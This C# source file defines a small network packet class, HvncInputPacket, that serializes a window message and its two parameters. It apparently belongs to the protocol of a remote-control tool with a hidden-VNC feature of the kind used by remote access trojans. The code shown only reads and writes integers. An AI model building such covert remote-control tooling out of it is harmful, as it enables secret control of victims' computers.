using System.IO;

namespace Crysome.Common.Network.Packets.Server;

public class HvncInputPacket : IPacket
{
	public int Msg { get; set; }

	public int WParam { get; set; }

	public int LParam { get; set; }

	public void Write(BinaryWriter w)
	{
		w.Write(Msg);
		w.Write(WParam);
		w.Write(LParam);
	}

	public void Read(BinaryReader r)
	{
		Msg = r.ReadInt32();
		WParam = r.ReadInt32();
		LParam = r.ReadInt32();
	}
}
